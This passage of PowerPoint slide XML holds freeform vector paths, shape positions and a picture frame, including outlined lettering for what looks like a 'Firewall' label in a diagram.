                    <a:pt x="3165246" y="2286608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3194736" y="2281691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3229141" y="2276774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3258631" y="2266939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3288121" y="2252186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3337270" y="2222682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3356930" y="2198095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3381505" y="2178425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3401165" y="2158755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3415910" y="2134168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3425740" y="2104663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3440485" y="2080076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3450315" y="2050571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3455230" y="2021067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3455230" y="1991562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3450315" y="1952223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3445400" y="1917801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3479805" y="1922718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3519125" y="1927635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3553529" y="1932553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3592849" y="1932553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3700979" y="1922718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3755044" y="1907966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3804193" y="1893213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3853343" y="1873544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3897578" y="1848956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3976218" y="1789947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4045027" y="1721103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4069602" y="1676846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4094177" y="1637507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4113837" y="1593250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4133497" y="1494901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4138412" y="1445726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4133497" y="1396552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4123667" y="1347378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4113837" y="1303121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4094177" y="1258864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4069602" y="1214607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4045027" y="1175267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4010623" y="1135928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3976218" y="1101506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3936898" y="1072001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3897578" y="1047414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3853343" y="1017909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3804193" y="998240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3755044" y="983487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3700979" y="968735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3592849" y="958900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3558444" y="963817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3524040" y="963817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489635" y="968735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3455230" y="978570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3455230" y="850716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3450315" y="811377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3445400" y="776955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3435570" y="742533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3425740" y="713028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3415910" y="678606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3386420" y="609762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3356930" y="550753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3337270" y="521248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3317610" y="496661"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3297951" y="467156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3273376" y="442569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3253716" y="417982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3229141" y="393395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3204566" y="373725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3179991" y="349138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3121011" y="309798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3032542" y="265541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2968647" y="240954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2899837" y="221284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2796623" y="206532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2762218" y="206532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2698323" y="211449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2639343" y="216367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2580364" y="236037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2521384" y="250789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2413254" y="299963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2369019" y="334385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2319870" y="368807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2270720" y="290128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2241230" y="255706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2211740" y="216367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2142930" y="157358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2103611" y="127853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2059376" y="98348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2015141" y="78679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1975821" y="59009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1926671" y="39339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1882437" y="24587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1833287" y="9834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1734987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4CB6B333-1D52-54CA-79D0-E902A287085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920" y="2208657"/>
              <a:ext cx="3897578" cy="2443967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EC2FB898-DB45-B997-D861-11741B75911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31" y="2116881"/>
              <a:ext cx="4374869" cy="2717800"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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B7232FF6-3A72-6D9F-14B0-E1EE03C7C22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3924" y="3146549"/>
              <a:ext cx="353009" cy="561924"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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1BAB5715-5B9B-F085-62D3-1302A8045C2D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4638579" y="3108767"/>
              <a:ext cx="431165" cy="618490"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="370141" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="64506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="591120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61922" y="618016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143878" y="603328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65791" y="603328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61509" y="602827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63724" y="602430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26321" y="586184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="586184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10446" y="579289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="579289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="78228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8757" y="78228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="70836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51161" y="70836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368763" y="15469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="366930" y="14804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410961" y="14804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370141" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="63724" y="602430"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="61509" y="602827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65791" y="603328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63724" y="602430"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="415833" y="539326"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="63724" y="602430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65791" y="603328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143878" y="603328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430791" y="551908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430791" y="545617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415833" y="545617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415833" y="539326"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="10446" y="579289"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="14958" y="586184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="581248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10446" y="579289"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="14958" y="581248"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="14958" y="586184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26321" y="586184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="581248"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="14958" y="579289"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10446" y="579289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="581248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="579289"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="421995" y="538221"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="415833" y="539326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415833" y="545617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421995" y="538221"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="430791" y="538221"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="421995" y="538221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415833" y="545617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430791" y="545617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430791" y="538221"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="415833" y="32542"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="415833" y="539326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421995" y="538221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430791" y="538221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430791" y="34336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420779" y="34336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415833" y="32542"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="14958" y="70836"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8757" y="78228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="77147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="70836"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="14958" y="77147"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8757" y="78228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="78228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="77147"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="51161" y="70836"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="14958" y="70836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="77147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51161" y="70836"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="415833" y="27264"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="415833" y="32542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420779" y="34336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415833" y="27264"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="430791" y="27264"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="415833" y="27264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420779" y="34336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430791" y="34336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430791" y="27264"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="410961" y="14804"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="366930" y="14804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370739" y="15124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368763" y="15469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415833" y="32542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415833" y="27264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430791" y="27264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430791" y="21996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410961" y="14804"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="366930" y="14804"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="368763" y="15469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370739" y="15124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="366930" y="14804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96B6CCEA-6194-9F1C-8198-F9D5AB6EA155}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4571918" y="3701818"/>
              <a:ext cx="573405" cy="155575"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="573404" h="155575">
                  <a:moveTo>
                    <a:pt x="573012" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="155447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573012" y="155447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573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CD50C77B-7E74-ACDA-D971-F3852BA3272F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4583419" y="3732338"/>
              <a:ext cx="551180" cy="96520"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="64758" y="4063"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23184" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23184" y="55839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61730" y="55839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61730" y="38343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23184" y="38343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23184" y="21539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64758" y="21539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64758" y="4063"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="103954" y="26273"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="82050" y="26273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82050" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103954" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103954" y="26273"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="104564" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="81440" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81440" y="16560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104564" y="16560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104564" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="147723" y="26273"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="125818" y="26273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125818" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147723" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147723" y="48788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150466" y="47812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153026" y="47142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157781" y="46329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175215" y="46329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175215" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147723" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147723" y="26273"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="175215" y="46329"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="168268" y="46329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170847" y="46532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172350" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173379" y="47142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175215" y="47142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175215" y="46329"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="175215" y="26273"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="165912" y="26273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163796" y="26720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156704" y="29423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152518" y="32166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147723" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175215" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175215" y="26273"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="223210" y="24160"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="187082" y="45625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184501" y="60756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185183" y="68788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208929" y="94020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209109" y="94020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217192" y="95677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226847" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232151" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236987" y="95808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245724" y="94020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250377" y="92577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255315" y="90606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255315" y="80893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221930" y="80893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216423" y="79471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208946" y="73822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206914" y="69738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206589" y="64393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256595" y="64393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256595" y="56733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256313" y="52752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256231" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206528" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206836" y="47020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206853" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208356" y="43261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211079" y="41086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213707" y="38953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217236" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252160" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251880" y="37219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248224" y="32552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243518" y="28883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237782" y="26261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231394" y="24774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232329" y="24774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223210" y="24160"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="255315" y="73070"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="252877" y="73070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250377" y="74960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246964" y="76748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238308" y="80060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233837" y="80893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255315" y="80893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255315" y="73070"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="252160" y="37815"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="225974" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229326" y="38953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231460" y="41269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233614" y="43566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234671" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234752" y="47020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234853" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256231" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256070" y="49311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254681" y="43566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254607" y="43261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254497" y="42806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252160" y="37815"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="289818" y="26273"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="266897" y="26273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287847" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311255" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317585" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301522" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289818" y="26273"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="341957" y="48483"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="324991" y="48483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338869" y="94426"/>
                  </a:lnTo>
